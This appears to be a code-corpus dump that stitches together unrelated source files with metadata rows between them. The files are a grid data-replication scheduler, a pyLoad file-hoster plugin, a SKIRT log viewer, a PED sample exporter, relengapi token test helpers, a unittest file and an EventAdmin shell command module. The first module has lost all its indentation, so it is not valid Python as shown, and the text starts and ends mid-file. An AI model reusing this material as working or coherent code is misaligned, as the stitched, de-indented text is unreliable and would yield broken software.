opFileToSchedule = toSchedule[lfn][0]
opFileToSchedule.GUID = lfnMetadata['GUID']
# In principle this is defined already in filterReplicas()
if not opFileToSchedule.Checksum:
opFileToSchedule.Checksum = metadata[lfn]['Checksum']
opFileToSchedule.ChecksumType = metadata[lfn]['ChecksumType']
opFileToSchedule.Size = metadata[lfn]['Size']
filesToSchedule[opFileToSchedule.LFN] = opFileToSchedule
return S_OK(filesToSchedule)
def _filterReplicas(self, opFile):
""" filter out banned/invalid source SEs """
return filterReplicas(opFile, logger=self.log, dataManager=self.dm)
def ftsTransfer(self):
""" replicate and register using FTS """
self.log.info("scheduling files in FTS...")
bannedTargets = self.checkSEsRSS()
if not bannedTargets['OK']:
gMonitor.addMark("FTSScheduleAtt")
gMonitor.addMark("FTSScheduleFail")
return bannedTargets
if bannedTargets['Value']:
return S_OK("%s targets are banned for writing" % ",".join(bannedTargets['Value']))
# Can continue now
self.log.verbose("No targets banned for writing")
toSchedule = {}
delayExecution = 0
errors = defaultdict(int)
for opFile in self.getWaitingFilesList():
opFile.Error = ''
gMonitor.addMark("FTSScheduleAtt")
# # check replicas
replicas = self._filterReplicas(opFile)
if not replicas["OK"]:
continue
replicas = replicas["Value"]
validReplicas = replicas.get("Valid")
noMetaReplicas = replicas.get("NoMetadata")
noReplicas = replicas.get('NoReplicas')
badReplicas = replicas.get('Bad')
noActiveReplicas = replicas.get('NoActiveReplicas')
if validReplicas:
validTargets = list(set(self.operation.targetSEList) - set(validReplicas))
if not validTargets:
self.log.info("file %s is already present at all targets" % opFile.LFN)
opFile.Status = "Done"
else:
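          # Keep the opFile together with its valid source replicas and the target SEs still missing the file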
toSchedule[opFile.LFN] = [opFile, validReplicas, validTargets]
else:
gMonitor.addMark("FTSScheduleFail")
if noMetaReplicas:
err = "Couldn't get metadata"
errors[err] += 1
self.log.verbose(
"unable to schedule '%s', %s at %s" %
(opFile.LFN, err, ','.join(noMetaReplicas)))
opFile.Error = err
elif noReplicas:
err = "File doesn't exist"
errors[err] += 1
self.log.error("Unable to schedule transfer",
"%s %s at %s" % (opFile.LFN, err, ','.join(noReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif badReplicas:
err = "All replicas have a bad checksum"
errors[err] += 1
self.log.error("Unable to schedule transfer",
"%s, %s at %s" % (opFile.LFN, err, ','.join(badReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif noActiveReplicas:
err = "No active replica found"
errors[err] += 1
self.log.verbose("Unable to schedule transfer",
"%s, %s at %s" % (opFile.LFN, err, ','.join(noActiveReplicas)))
opFile.Error = err
# All source SEs are banned, delay execution by 1 hour
delayExecution = 60
if delayExecution:
self.log.info("Delay execution of the request by %d minutes" % delayExecution)
self.request.delayNextExecution(delayExecution)
# Log error counts
for error, count in errors.iteritems():
self.log.error(error, 'for %d files' % count)
filesToScheduleList = []
res = self._addMetadataToFiles(toSchedule)
if not res['OK']:
return res
else:
filesToSchedule = res['Value']
for lfn in filesToSchedule:
filesToScheduleList.append((filesToSchedule[lfn][0].toJSON()['Value'],
toSchedule[lfn][1],
toSchedule[lfn][2]))
if filesToScheduleList:
ftsSchedule = FTSClient().ftsSchedule(self.request.RequestID,
self.operation.OperationID,
filesToScheduleList)
if not ftsSchedule["OK"]:
self.log.error("Completely failed to schedule to FTS:", ftsSchedule["Message"])
return ftsSchedule
# might have nothing to schedule
ftsSchedule = ftsSchedule["Value"]
if not ftsSchedule:
return S_OK()
self.log.info("%d files have been scheduled to FTS" % len(ftsSchedule['Successful']))
for opFile in self.operation:
fileID = opFile.FileID
if fileID in ftsSchedule["Successful"]:
gMonitor.addMark("FTSScheduleOK", 1)
opFile.Status = "Scheduled"
self.log.debug("%s has been scheduled for FTS" % opFile.LFN)
elif fileID in ftsSchedule["Failed"]:
gMonitor.addMark("FTSScheduleFail", 1)
opFile.Error = ftsSchedule["Failed"][fileID]
if 'sourceSURL equals to targetSURL' in opFile.Error:
# In this case there is no need to continue
opFile.Status = 'Failed'
self.log.warn("unable to schedule %s for FTS: %s" % (opFile.LFN, opFile.Error))
else:
self.log.info("No files to schedule after metadata checks")
# Just in case some transfers could not be scheduled, try them with RM
return self.dmTransfer(fromFTS=True)
def _checkExistingFTS3Operations(self):
"""
    Check if there are ongoing FTS3Operations for the current RMS Operation
Under some conditions, we can be trying to schedule files while
there is still an FTS transfer going on. This typically happens
    when the REA hangs. To prevent a further race condition, we check
if there are FTS3Operations in a non Final state matching the
current operation ID. If so, we put the corresponding files in
scheduled mode. We will then wait till the FTS3 Operation performs
the callback
:returns: S_OK with True if we can go on, False if we should stop the processing
"""
res = FTS3Client().getOperationsFromRMSOpID(self.operation.OperationID)
if not res['OK']:
self.log.debug(
"Could not get FTS3Operations matching OperationID",
self.operation.OperationID)
return res
existingFTSOperations = res['Value']
# It is ok to have FTS Operations in a final state, so we
# care only about the others
unfinishedFTSOperations = [
ops for ops in existingFTSOperations if ops.status not in FTS3TransferOperation.FINAL_STATES]
if not unfinishedFTSOperations:
self.log.debug("No ongoing FTS3Operations, all good")
return S_OK(True)
self.log.warn("Some FTS3Operations already exist for the RMS Operation:",
[op.operationID for op in unfinishedFTSOperations])
# This would really be a screwed up situation !
if len(unfinishedFTSOperations) > 1:
self.log.warn("That's a serious problem !!")
# We take the rmsFileID of the files in the Operations,
# find the corresponding File object, and set them scheduled
rmsFileIDsToSetScheduled = set(
[ftsFile.rmsFileID for ftsOp in unfinishedFTSOperations for ftsFile in ftsOp.ftsFiles])
for opFile in self.operation:
# If it is in the DB, it has a FileID
opFileID = opFile.FileID
if opFileID in rmsFileIDsToSetScheduled:
self.log.warn("Setting RMSFile as already scheduled", opFileID)
opFile.Status = "Scheduled"
# We return here such that the Request is set back to Scheduled in the DB
# With no further modification
return S_OK(False)
def fts3Transfer(self):
""" replicate and register using FTS3 """
self.log.info("scheduling files in FTS3...")
# Check first if we do not have ongoing transfers
res = self._checkExistingFTS3Operations()
if not res['OK']:
return res
# if res['Value'] is False
# it means that there are ongoing transfers
# and we should stop here
if res['Value'] is False:
# return S_OK such that the request is put back
return S_OK()
fts3Files = []
toSchedule = {}
# Dict which maps the FileID to the object
rmsFilesIds = {}
for opFile in self.getWaitingFilesList():
rmsFilesIds[opFile.FileID] = opFile
opFile.Error = ''
gMonitor.addMark("FTSScheduleAtt")
# # check replicas
replicas = self._filterReplicas(opFile)
if not replicas["OK"]:
continue
replicas = replicas["Value"]
validReplicas = replicas["Valid"]
noMetaReplicas = replicas["NoMetadata"]
noReplicas = replicas['NoReplicas']
badReplicas = replicas['Bad']
noPFN = replicas['NoPFN']
if validReplicas:
validTargets = list(set(self.operation.targetSEList) - set(validReplicas))
if not validTargets:
self.log.info("file %s is already present at all targets" % opFile.LFN)
opFile.Status = "Done"
else:
toSchedule[opFile.LFN] = [opFile, validTargets]
else:
gMonitor.addMark("FTSScheduleFail")
if noMetaReplicas:
self.log.warn("unable to schedule '%s', couldn't get metadata at %s" % (opFile.LFN, ','.join(noMetaReplicas)))
opFile.Error = "Couldn't get metadata"
elif noReplicas:
self.log.error(
"Unable to schedule transfer", "File %s doesn't exist at %s" %
(opFile.LFN, ','.join(noReplicas)))
opFile.Error = 'No replicas found'
opFile.Status = 'Failed'
elif badReplicas:
self.log.error(
"Unable to schedule transfer",
"File %s, all replicas have a bad checksum at %s" %
(opFile.LFN,
','.join(badReplicas)))
opFile.Error = 'All replicas have a bad checksum'
opFile.Status = 'Failed'
elif noPFN:
self.log.warn(
"unable to schedule %s, could not get a PFN at %s" %
(opFile.LFN, ','.join(noPFN)))
res = self._addMetadataToFiles(toSchedule)
if not res['OK']:
return res
else:
filesToSchedule = res['Value']
for lfn in filesToSchedule:
opFile = filesToSchedule[lfn]
validTargets = toSchedule[lfn][1]
for targetSE in validTargets:
ftsFile = FTS3File.fromRMSFile(opFile, targetSE)
fts3Files.append(ftsFile)
if fts3Files:
res = Registry.getUsernameForDN(self.request.OwnerDN)
if not res['OK']:
self.log.error(
"Cannot get username for DN", "%s %s" %
(self.request.OwnerDN, res['Message']))
return res
username = res['Value']
fts3Operation = FTS3TransferOperation.fromRMSObjects(self.request, self.operation, username)
fts3Operation.ftsFiles = fts3Files
ftsSchedule = FTS3Client().persistOperation(fts3Operation)
if not ftsSchedule["OK"]:
self.log.error("Completely failed to schedule to FTS3:", ftsSchedule["Message"])
return ftsSchedule
# might have nothing to schedule
ftsSchedule = ftsSchedule["Value"]
self.log.info("Scheduled with FTS3Operation id %s" % ftsSchedule)
self.log.info("%d files have been scheduled to FTS3" % len(fts3Files))
for ftsFile in fts3Files:
opFile = rmsFilesIds[ftsFile.rmsFileID]
gMonitor.addMark("FTSScheduleOK", 1)
opFile.Status = "Scheduled"
self.log.debug("%s has been scheduled for FTS" % opFile.LFN)
else:
self.log.info("No files to schedule after metadata checks")
# Just in case some transfers could not be scheduled, try them with RM
return self.dmTransfer(fromFTS=True)
def dmTransfer(self, fromFTS=False):
""" replicate and register using dataManager """
# # get waiting files. If none just return
# # source SE
sourceSE = self.operation.SourceSE if self.operation.SourceSE else None
if sourceSE:
# # check source se for read
bannedSource = self.checkSEsRSS(sourceSE, 'ReadAccess')
if not bannedSource["OK"]:
gMonitor.addMark("ReplicateAndRegisterAtt", len(self.operation))
gMonitor.addMark("ReplicateFail", len(self.operation))
return bannedSource
if bannedSource["Value"]:
self.operation.Error = "SourceSE %s is banned for reading" % sourceSE
self.log.info(self.operation.Error)
return S_OK(self.operation.Error)
# # check targetSEs for write
bannedTargets = self.checkSEsRSS()
if not bannedTargets['OK']:
gMonitor.addMark("ReplicateAndRegisterAtt", len(self.operation))
gMonitor.addMark("ReplicateFail", len(self.operation))
return bannedTargets
if bannedTargets['Value']:
self.operation.Error = "%s targets are banned for writing" % ",".join(bannedTargets['Value'])
return S_OK(self.operation.Error)
# Can continue now
self.log.verbose("No targets banned for writing")
waitingFiles = self.getWaitingFilesList()
if not waitingFiles:
return S_OK()
# # loop over files
if fromFTS:
self.log.info("Trying transfer using replica manager as FTS failed")
else:
self.log.info("Transferring files using Data manager...")
errors = defaultdict(int)
delayExecution = 0
for opFile in waitingFiles:
if opFile.Error in ("Couldn't get metadata",
"File doesn't exist",
'No active replica found',
"All replicas have a bad checksum",):
err = "File already in error status"
errors[err] += 1
gMonitor.addMark("ReplicateAndRegisterAtt", 1)
opFile.Error = ''
lfn = opFile.LFN
# Check if replica is at the specified source
replicas = self._filterReplicas(opFile)
if not replicas["OK"]:
self.log.error('Failed to check replicas', replicas["Message"])
continue
replicas = replicas["Value"]
validReplicas = replicas.get("Valid")
noMetaReplicas = replicas.get("NoMetadata")
noReplicas = replicas.get('NoReplicas')
badReplicas = replicas.get('Bad')
noActiveReplicas = replicas.get('NoActiveReplicas')
if not validReplicas:
gMonitor.addMark("ReplicateFail")
if noMetaReplicas:
err = "Couldn't get metadata"
errors[err] += 1
self.log.verbose(
"unable to replicate '%s', couldn't get metadata at %s" %
(opFile.LFN, ','.join(noMetaReplicas)))
opFile.Error = err
elif noReplicas:
err = "File doesn't exist"
errors[err] += 1
self.log.verbose(
"Unable to replicate", "File %s doesn't exist at %s" %
(opFile.LFN, ','.join(noReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif badReplicas:
err = "All replicas have a bad checksum"
errors[err] += 1
self.log.error(
"Unable to replicate", "%s, all replicas have a bad checksum at %s" %
(opFile.LFN, ','.join(badReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif noActiveReplicas:
err = "No active replica found"
errors[err] += 1
self.log.verbose("Unable to schedule transfer",
"%s, %s at %s" % (opFile.LFN, err, ','.join(noActiveReplicas)))
opFile.Error = err
# All source SEs are banned, delay execution by 1 hour
delayExecution = 60
continue
# # get the first one in the list
if sourceSE not in validReplicas:
if sourceSE:
err = "File not at specified source"
errors[err] += 1
self.log.warn(
"%s is not at specified sourceSE %s, changed to %s" %
(lfn, sourceSE, validReplicas[0]))
sourceSE = validReplicas[0]
# # loop over targetSE
catalogs = self.operation.Catalog
if catalogs:
catalogs = [cat.strip() for cat in catalogs.split(',')]
for targetSE in self.operation.targetSEList:
# # call DataManager
if targetSE in validReplicas:
self.log.warn("Request to replicate %s to an existing location: %s" % (lfn, targetSE))
opFile.Status = 'Done'
continue
res = self.dm.replicateAndRegister(lfn, targetSE, sourceSE=sourceSE, catalog=catalogs)
if res["OK"]:
if lfn in res["Value"]["Successful"]:
if "replicate" in res["Value"]["Successful"][lfn]:
repTime = res["Value"]["Successful"][lfn]["replicate"]
prString = "file %s replicated at %s in %s s." % (lfn, targetSE, repTime)
gMonitor.addMark("ReplicateOK", 1)
if "register" in res["Value"]["Successful"][lfn]:
gMonitor.addMark("RegisterOK", 1)
regTime = res["Value"]["Successful"][lfn]["register"]
prString += ' and registered in %s s.' % regTime
self.log.info(prString)
else:
gMonitor.addMark("RegisterFail", 1)
prString += " but failed to register"
self.log.warn(prString)
opFile.Error = "Failed to register"
# # add register replica operation
registerOperation = self.getRegisterOperation(
opFile, targetSE, type='RegisterReplica')
self.request.insertAfter(registerOperation, self.operation)
else:
self.log.error("Failed to replicate", "%s to %s" % (lfn, targetSE))
gMonitor.addMark("ReplicateFail", 1)
opFile.Error = "Failed to replicate"
else:
gMonitor.addMark("ReplicateFail", 1)
reason = res["Value"]["Failed"][lfn]
self.log.error(
"Failed to replicate and register", "File %s at %s:" %
(lfn, targetSE), reason)
opFile.Error = reason
else:
gMonitor.addMark("ReplicateFail", 1)
opFile.Error = "DataManager error: %s" % res["Message"]
self.log.error("DataManager error", res["Message"])
if not opFile.Error:
if len(self.operation.targetSEList) > 1:
self.log.info("file %s has been replicated to all targetSEs" % lfn)
opFile.Status = "Done"
# Log error counts
if delayExecution:
self.log.info("Delay execution of the request by %d minutes" % delayExecution)
self.request.delayNextExecution(delayExecution)
for error, count in errors.iteritems():
self.log.error(error, 'for %d files' % count)
return S_OK()
| gpl-3.0 | 803,170,856,147,399,300 | 37.025066 | 120 | 0.628526 | false |
fener06/pyload | module/plugins/hoster/EuroshareEu.py | 1 | 2302 | # -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
@author: zoidberg
"""
import re
from module.plugins.internal.SimpleHoster import SimpleHoster, create_getInfo
class EuroshareEu(SimpleHoster):
__name__ = "EuroshareEu"
__type__ = "hoster"
__pattern__ = r"http://(\w*\.)?euroshare.(eu|sk|cz|hu|pl)/file/.*"
__version__ = "0.23"
__description__ = """Euroshare.eu"""
__author_name__ = ("zoidberg")
FILE_INFO_PATTERN = r'<span style="float: left;"><strong>(?P<N>.+?)</strong> \((?P<S>.+?)\)</span>'
FILE_OFFLINE_PATTERN = ur'<h2>S.bor sa nena.iel</h2>|Požadovaná stránka neexistuje!'
FREE_URL_PATTERN = r'<a href="(/file/\d+/[^/]*/download/)"><div class="downloadButton"'
ERR_PARDL_PATTERN = r'<h2>Prebieha s.ahovanie</h2>|<p>Naraz je z jednej IP adresy mo.n. s.ahova. iba jeden s.bor'
FILE_URL_REPLACEMENTS = [(r"(http://[^/]*\.)(sk|cz|hu|pl)/", r"\1eu/")]
def handlePremium(self):
self.download(self.pyfile.url.rstrip('/') + "/download/")
def handleFree(self):
if re.search(self.ERR_PARDL_PATTERN, self.html) is not None:
self.longWait(300, 12)
found = re.search(self.FREE_URL_PATTERN, self.html)
if found is None:
self.parseError("Parse error (URL)")
parsed_url = "http://euroshare.eu%s" % found.group(1)
self.logDebug("URL", parsed_url)
self.download(parsed_url, disposition=True)
check = self.checkDownload({"multi_dl": re.compile(self.ERR_PARDL_PATTERN)})
if check == "multi_dl":
self.longWait(300, 12)
getInfo = create_getInfo(EuroshareEu) | gpl-3.0 | 7,234,009,282,891,823,000 | 40.071429 | 117 | 0.629839 | false |
SKIRT/PTS | do/core/show_simulation_log.py | 1 | 2931 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.do.core.show_simulation_log Show the log output of a remote SKIRT simulation.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import the relevant PTS classes and modules
from pts.core.basics.configuration import ConfigurationDefinition, parse_arguments
from pts.core.remote.host import find_host_ids
from pts.core.tools import filesystem as fs
from pts.core.remote.remote import Remote
from pts.core.simulation.remote import get_simulation_for_host, get_simulation_id
# -----------------------------------------------------------------
# Create the configuration definition
definition = ConfigurationDefinition()
# Add required
definition.add_required("remote", "string", "name of the remote host", choices=find_host_ids())
definition.add_positional_optional("id", "positive_integer", "simulation ID")
definition.add_optional("name", "string", "simulation name")
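# Illustrative invocation (the host ID and simulation ID below are hypothetical):
#   pts show_simulation_log myhost 12
# or, selecting the simulation by name instead of by ID:
#   pts show_simulation_log myhost --name MySimulation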
# -----------------------------------------------------------------
# Parse the arguments into a configuration
config = parse_arguments("show_simulation_log", definition, description="Show the log output of a remote SKIRT simulation")
# -----------------------------------------------------------------
# Determine simulation ID
if config.name is not None:
    if config.id is not None: raise ValueError("Cannot specify both name and simulation ID")
simulation_id = get_simulation_id(config.remote, config.name)
else: simulation_id = config.id
# -----------------------------------------------------------------
# Open the simulation
simulation = get_simulation_for_host(config.remote, simulation_id)
# The name of the ski file (the simulation prefix)
ski_name = simulation.prefix()
# Simulation is retrieved
if simulation.retrieved:
# Determine the path to the simulation log file
local_log_file_path = simulation.log_file_path
# Read the log file
lines = fs.read_lines(local_log_file_path)
# Not yet retrieved
else:
# The path to the simulation log file
remote_log_file_path = simulation.remote_log_file_path
# Create and setup the remote
remote = Remote()
remote.setup(config.remote)
# Check whether the log file exists
if not remote.is_file(remote_log_file_path): raise RuntimeError("The log file does not (yet) exist remotely")
# Read the log file
lines = remote.read_lines(remote_log_file_path)
# Print the lines of the log file
for line in lines: print(line)
# -----------------------------------------------------------------
| agpl-3.0 | 2,216,039,816,062,871,300 | 35.17284 | 123 | 0.601024 | false |
labsquare/CuteVariant | cutevariant/core/writer/pedwriter.py | 1 | 2889 | import csv
from .abstractwriter import AbstractWriter
from cutevariant.core.sql import get_samples
class PedWriter(AbstractWriter):
"""Writer allowing to export samples of a project into a PED/PLINK file.
Attributes:
device: a file object typically returned by open("w")
Example:
>>> with open(filename,"rw") as file:
... writer = MyWriter(file)
... writer.save(conn)
"""
def __init__(self, device):
super().__init__(device)
def save(self, conn, delimiter="\t", **kwargs):
r"""Dump samples into a tabular file
Notes:
File is written without header.
Example of line::
`family_id\tindividual_id\tfather_id\tmother_id\tsex\tphenotype`
Args:
conn (sqlite.connection): sqlite connection
delimiter (str, optional): Delimiter char used in exported file;
(default: ``\t``).
**kwargs (dict, optional): Arguments can be given to override
individual formatting parameters in the current dialect.
"""
writer = csv.DictWriter(
self.device,
delimiter=delimiter,
lineterminator="\n",
fieldnames=[
"family_id",
"name",
"father_id",
"mother_id",
"sex",
"phenotype",
],
extrasaction="ignore",
**kwargs
)
g = list(get_samples(conn))
# Map DB ids with individual_ids
individual_ids_mapping = {sample["id"]: sample["name"] for sample in g}
# Add default value
individual_ids_mapping[0] = 0
# Replace DB ids
for sample in g:
sample["father_id"] = individual_ids_mapping[sample["father_id"]]
sample["mother_id"] = individual_ids_mapping[sample["mother_id"]]
writer.writerows(g)
def save_from_list(self, samples, delimiter="\t", **kwargs):
r"""Dump samples into a tabular file
Args:
samples(list): Iterable of samples; each sample is a list itself.
                => It's up to the user to give the fields in the correct order.
delimiter (str, optional): Delimiter char used in exported file;
(default: ``\t``).
**kwargs (dict, optional): Arguments can be given to override
individual formatting parameters in the current dialect.
Notes:
Replace None or empty strings to 0 (unknown PED ID)
"""
writer = csv.writer(
self.device, delimiter=delimiter, lineterminator="\n", **kwargs
)
# Replace None or empty strings to 0 (unknown PED ID)
clean_samples = ([item if item else 0 for item in sample] for sample in samples)
writer.writerows(clean_samples)
| gpl-3.0 | -2,977,546,047,046,953,000 | 32.988235 | 88 | 0.563171 | false |
Callek/build-relengapi | relengapi/blueprints/tokenauth/util.py | 1 | 2357 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import json
from itsdangerous import BadData
from relengapi.blueprints.tokenauth.tables import Token
from relengapi.lib.permissions import p
# test utilities
class FakeSerializer(object):
"""A token serializer that produces a readable serialization, for use in
tests."""
@staticmethod
def prm(id):
return FakeSerializer.dumps(
{"iss": "ra2", "jti": "t%d" % id, "typ": "prm"})
@staticmethod
def tmp(nbf, exp, prm, mta):
return FakeSerializer.dumps(
{"iss": "ra2", "typ": "tmp", 'nbf': nbf,
"exp": exp, "prm": prm, "mta": mta})
@staticmethod
def usr(id):
return FakeSerializer.dumps(
{"iss": "ra2", "jti": "t%d" % id, "typ": "usr"})
@staticmethod
def dumps(data):
return 'FK:' + json.dumps(data,
separators=(',', ':'),
sort_keys=True)
@staticmethod
def loads(data):
if data[:3] != 'FK:':
raise BadData('Not a fake token')
else:
return json.loads(data[3:])
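# For reference, the fake serialization is plain JSON with sorted keys behind an
# 'FK:' prefix, e.g. FakeSerializer.prm(1) returns
# 'FK:{"iss":"ra2","jti":"t1","typ":"prm"}'.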
# sample tokens, both a function to insert, and a JSON representation of the
# corresponding result.
def insert_prm(app):
session = app.db.session('relengapi')
t = Token(
id=1,
typ='prm',
disabled=False,
permissions=[p.test_tokenauth.zig],
description="Zig only")
session.add(t)
session.commit()
prm_json = {
'id': 1,
'typ': 'prm',
'description': 'Zig only',
'permissions': ['test_tokenauth.zig'],
'disabled': False,
}
def insert_usr(app, permissions=[p.test_tokenauth.zig], disabled=False):
session = app.db.session('relengapi')
t = Token(
id=2,
typ='usr',
user='[email protected]',
permissions=permissions,
disabled=disabled,
description="User Zig")
session.add(t)
session.commit()
usr_json = {
'id': 2,
'typ': 'usr',
'user': '[email protected]',
'description': 'User Zig',
'permissions': ['test_tokenauth.zig'],
'disabled': False,
}
def insert_all(app):
insert_prm(app)
insert_usr(app)
| mpl-2.0 | -2,998,231,699,835,763,000 | 23.05102 | 76 | 0.570216 | false |
russb78/RDuD2 | RDuD2/modules/helperfuncs.py | 1 | 1066 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# controlfuncs.py
#
# Copyright 2013 Russell Barnes
#
from nanpy import Arduino
def map(x, in_min, in_max, out_min, out_max):
"""
    Arduino-style map(): linearly rescale x from the input range
    [in_min, in_max] to the output range [out_min, out_max].
"""
return (x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min
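# Quick sanity check (illustrative values, not tied to any particular sensor):
# map(512, 0, 1023, 0, 255) rescales a 10-bit reading to the 8-bit range,
# yielding ~127.6 (truncated to 127 under Python 2 integer division).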
def degrees(x): ### Tweak specifically for your own robot with testing ###
"""
    x is the number of degrees you wish the robot to spin on the spot:
    0 == none, 359 == a full 360 degree spin. The return value is the Arduino.delay length.
"""
return (x - 0) * (1021 - 0) / (359 - 0) + 0
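# Rough sanity check (illustrative): degrees(180) comes out to roughly 512,
# i.e. a half turn maps to about half of the 0-1021 delay range.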
def pan_angle(x):
"""
    Pan servo range should be constrained between 0-149
(x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min
"""
return (x - 0) * (149 - 0) / (179 - 0) + 0
def tilt_angle(x):
"""
Tilt servo range should be constrained between 50-179
(x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min
"""
return (x - 0) * (179 - 50) / (179 - 0) + 50
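# Illustrative mid-points: pan_angle(90) is about 75 and tilt_angle(90) about 115,
# i.e. a 0-179 degree request is squeezed into each servo's safe range.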
| mit | 8,028,310,621,455,294,000 | 27.052632 | 76 | 0.567542 | false |
kubow/HAC | System/test.py | 1 | 3854 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import unittest
from log import Log
from DV72 import ControlDevice
from OS74 import CurrentPlatform, FileSystemObject
from MP74 import OpenWeatherMap
from TX74 import WebContent
def load_platform_based(from_path, web=None):
base = FileSystemObject().dir_up(2)
print(base)
if web:
return web + base + from_path
else:
return base + from_path
class DeviceSetting(unittest.TestCase):
"""Check if logging can process"""
def test_device_basic(self):
dev = ControlDevice()
logger = Log(load_platform_based('Script/Multimedia/logfile.log'), 'Device', 'test.py', False)
text = 'Checking device ({0}) setting: {1}'.format(dev.device_name, dev.setup_db)
logger.log_operation(text)
        self.assertEqual(dev.interval_shift, 2)
class TestLocalContent(unittest.TestCase):
"""Check if local data accessible"""
def test_local_content(self):
location = FileSystemObject().dir_up(1)
fso = FileSystemObject(location)
logger = Log(load_platform_based('Script/Multimedia/logfile.log'), 'Folder', 'test.py', False)
text = 'Checking folder ({0}) manageable: {1}'.format(location, str(1))
logger.log_operation(text)
self.assertEqual(fso.path, 'C:\\_Run\\Script\\Multimedia')
class TestWeather(unittest.TestCase):
"""Check if weather data accessible"""
def test_weather(self):
loc = 'Horni Pocernice,cz' # 'Necin,cz'
try:
o = OpenWeatherMap(loc)
text = 'Checking weather at location ({0}) manageable: {1}'.format(loc, o.heading[0])
except:
text = 'Cannot properly get {0} data : {1}'.format(loc, str(None))
logger = Log(load_platform_based('Script/Multimedia/logfile.log'), 'Weather', 'test.py', False)
logger.log_operation(text)
self.assertIn(loc.split(',')[-1], o.heading[0])
def test_dummy_weather(self):
"""Check if can treat no submitted location"""
loc = '' # 'Necin,cz'
try:
o = OpenWeatherMap(loc)
text = 'Checking weather at location ({0}) manageable: {1}'.format(loc, o.heading[0])
except:
text = 'Cannot properly get {0} data : {1}'.format(loc, str(None))
logger = Log(load_platform_based('Script/Multimedia/logfile.log'), 'Weather', 'test.py', False)
logger.log_operation(text)
self.assertIn(loc.split(',')[-1], o.heading[0])
class TestWebContent(unittest.TestCase):
"""Check if web data (local/internet) accessible"""
def test_localhost_content(self):
try:
o = WebContent(load_platform_based('Web/index.html', 'file:///'))
o.process_url()
text = 'Checking Web Content of ({0}) : {1}'.format('index.html', o.url)
except:
text = 'Cannot properly get {0} from : {1}'.format('Web/index.html', o.url)
logger = Log(load_platform_based('Script/Multimedia/logfile.log'), 'Webfile', 'test.py', False)
logger.log_operation(text)
self.assertIn('encyklopedie', str(o.div))
def test_web_content(self):
try:
o = WebContent('https://aktualnizpravy.cz/')
o.process_url()
text = 'Check Web Content ({0}) : {1}'.format('index.html', o.url)
except:
text = 'Cannot properly get {0} from : {1}'.format('index.html', o.url)
logger = Log(load_platform_based('Script/Multimedia/logfile.log'), 'Webfile', 'test.py', False)
logger.log_operation(text)
self.assertIn('dnes m', str(o.div))
def test_rss_content(self):
try:
o = WebContent('http://www.root.cz/rss/clanky/', mode='rss')
except:
            print('something bad happened')
self.assertIn('root.cz', o.div)
if __name__ == '__main__':
    unittest.main()
| unlicense | -2,545,163,283,945,300,000 | 37.929293 | 103 | 0.608978 | false |
tcalmant/ipopo | pelix/shell/eventadmin.py | 1 | 2445 | #!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
EventAdmin shell commands
Provides commands to the Pelix shell to work with the EventAdmin service
:author: Thomas Calmant
:copyright: Copyright 2020, Thomas Calmant
:license: Apache License 2.0
:version: 1.0.1
..
Copyright 2020 Thomas Calmant
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Shell constants
from pelix.shell import SERVICE_SHELL_COMMAND
# iPOPO Decorators
from pelix.ipopo.decorators import (
ComponentFactory,
Requires,
Provides,
Instantiate,
)
import pelix.services
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (1, 0, 1)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# -----------------------------------------------------------------------------
@ComponentFactory("eventadmin-shell-commands-factory")
@Requires("_events", pelix.services.SERVICE_EVENT_ADMIN)
@Provides(SERVICE_SHELL_COMMAND)
@Instantiate("eventadmin-shell-commands")
class EventAdminCommands(object):
"""
EventAdmin shell commands
"""
def __init__(self):
"""
Sets up members
"""
# Injected services
self._events = None
@staticmethod
def get_namespace():
"""
Retrieves the name space of this command handler
"""
return "event"
def get_methods(self):
"""
Retrieves the list of tuples (command, method) for this command handler
"""
return [("send", self.send), ("post", self.post)]
def send(self, _, topic, **kwargs):
"""
Sends an event (blocking)
"""
self._events.send(topic, kwargs)
def post(self, _, topic, **kwargs):
"""
Posts an event (asynchronous)
"""
self._events.post(topic, kwargs)
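# Illustrative use from the Pelix shell (the session below is hypothetical; the
# keyword arguments become the event properties):
#   $ event.send sensors/temperature value=21.5
#   $ event.post sensors/temperature value=21.5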
| apache-2.0 | -5,305,253,819,971,711,000 | 25.290323 | 80 | 0.61227 | false |
openstack/networking-bgpvpn | networking_bgpvpn/tests/unit/services/bagpipe/test_bagpipe.py | 1 | 48898 | # Copyright (c) 2015 Orange.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
